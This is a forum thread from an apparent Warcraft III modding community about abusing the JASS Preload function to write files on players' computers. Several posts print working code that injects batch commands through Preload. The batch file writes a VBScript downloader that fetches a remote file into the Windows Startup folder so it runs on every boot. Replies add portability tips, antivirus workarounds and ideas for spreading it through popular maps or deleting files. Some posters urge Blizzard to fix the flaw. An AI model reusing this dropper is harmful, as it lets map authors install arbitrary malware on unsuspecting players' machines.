How to virus in Warcraft III

[GetTriggerUnit-]

IRL, J4L is a hacker. And he shares his tricks. REGEDIT TRICK PLS

 

[Laiev]

Oo why a hacker are editing a game script?

is better get a newgame and *pãn pãn*

 

[DioD]

nobody cares

 

[mylemonblue]

The fact you bothered to retaliate with such a comment implies someone does care

 

[D4RK_G4ND4LF]

just made an account to congratulate you for this
badass bug
got a compile error (win 7 64 bit) but the myvirus.bat was created

how does it work btw?

 

[GetTriggerUnit-]

The script is executed from W3 and downloads viruses from the internets.

 

[Jesus4Lyf]

just made an account to congratulate you for this
badass bug
got a compile error (win 7 64 bit) but the myvirus.bat was created

how does it work btw?

//..
    call PreloadGenClear() // this line and the line below start writing a JASS function to preload models
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//") // this line, and all other "Preload(...)" lines add a line to preload a "model" to that function. Instead, we add a new line and put some batch script in.
    // batch scripts ignore syntax errors, so it will ignore the jass syntax and execute the echo/start lines. I use it to write a VB script to download a file and put it in your startup. You could do anything, though.
    // ...
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat") // this ends the list, and saves it to Start > Programs > Startup, and windows automatically runs everything there. my batch script makes a vbs script with echo, and then runs it, that script then downloads the specified file here. hooray!!

There's yer explanation, and that's why WC3 should never be able to write to a file. The vulnerability is the fact that WC3 can do that, in essence.

The script is executed from W3 and downloads viruses from the internets.

The JASS script is executed in WC3 and makes the batch script. The batch script is executed on boot and creates the vbs script. The vbs script is executed by the batch script and downloads the file. The downloaded file runs from then on, on startup.

 

[Sevion]

And if I hardly ever restart my PC? Lol

 

[Laiev]

what happen if you hardly restart your PC when you're downloading something Sev?

 

[Sevion]

I'm not sure I know what you mean. What I mean is that since I hardly restart my PC, the startup programs are hardly run (started).

 

[Gwafu]

So, these could be used to download anything to the player's computer? Great, could use it with .slks :3

 

[cano]

Do I have to have local files enabled for it to work?

Edit: The file is created if its extension is not *.bat or *.exe. For a while I was able to create bat files and for whatever reason it was after I removed this line:

call Preload("\")\n\necho objFSO.DeleteFile \"C:\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")

Which is quite ridiculous.

And while the idea of using startup is pretty nice, It's hard to believe that this fairly simple exploit is made public for the first time 8 years after release of the game. o.o

Edit 2: Turning off Avast helped.

 

[Accname]

@Jesus4Lyf:
if my windows aint installed on the harddrive C but on D it wouldnt work i guess, right?

 

[cano]

@Jesus4Lyf:
if my windows aint installed on the harddrive C but on D it wouldnt work i guess, right?

You can make it work, obviously. Just change all the paths accordingly, e.g.:

call PreloadGenEnd("D:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")

Inside the *.bat file you can use environment variables like %SystemDrive% (which returns letter of your system drive, in your case D.

Anyway, what is the purpose of this part:

 call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")

Why can't you just do it for All Users?

 

[Accname]

@Cano:
that i know myself. the point is somebody who made this map will not change the script code just especially for me shortly before i download the map. you get it?

i mean, if someone is seriously trying to spread a virus through some wc3 map and i download and start the map and my windows is on an other harddrive then C the code inside wouldnt work? or not?
will it crash? will it create the folders on my other harddrive? or what will happen?

Edit:
Just tested it myself. it will create these folders on the harddrive C. however, obviously nothing will happen when rebooting.

 

[DioD]

its possible to use

%systemdrive%

and

%username%

making code compatable with any windows on any HDD.

also you may create harmfull script to reboot PC instantly (or after random time) or remove valuble files from windows, but most players play 1-5 maps all time, its dangerous only if icefrog inject this to dota (or any similar map virused by author)

 

[UnknowVector]

It's shell access with the current user's privileges; on windows that probably means administrator. It doesn't really matter how your hard drive is set up, your screwed.

 

[cano]

@Cano:
that i know myself. the point is somebody who made this map will not change the script code just especially for me shortly before i download the map. you get it?

...
Just create the *.bat files on C:,D:,E: or whatever you assume to be system directory and for all other use %systemdrive%. Now, do you get it?

And I am the only one who gets this completely nullified by antivirus?
Trying to sneak an *.exe file causes Avast to alert too. Which obviously doesn't mean that this issue shouldn't be addressed by Blizzard. The danger is WAY higher than it used to be in case of possibility of executing arbitrary code through type casting, just because it can be done by literally everyone and the possibilities are greater.

 

[Accname]

...
Just create the *.bat files on C:,D:,E: or whatever you assume to be system directory and for all other use %systemdrive%. Now, do you get it?

And I am the only one who gets this completely nullified by antivirus?
Trying to sneak an *.exe file causes Avast to alert too. Which obviously doesn't mean that this issue shouldn't be addressed by Blizzard. The danger is WAY higher than it used to be in case of possibility of executing arbitrary code through type casting, just because it can be done by literally everyone and the possibilities are greater.

i think you dont really get what i was talking about.
if this is supposed to be a kind of "virus" then it shouldnt be my task to make it fit my computer. most probably someone else would make that virus map and try to spread it over the internet, for example to me. and hence he doesnt know on which harddrive windows is installed for me he wouldnt change C to D only to hit me you know? he doesnt think, "hmmm Accname doesnt have windows on C but on D, i should change the map shortly before he downloads and plays it to kick his ass" and i most probably wouldnt try to virus my own computer either.

of course, if what DioD said works then it isnt neccassary at all.

 

[Laiev]

If I'm not wrong, Accname are saying if someone know that he'll get the map, the creator of that map which have virus don't will change the script to fit the Accname computer, will fit the most 'common' type of computer, windows in C: and username Default (really, noone use this username lol)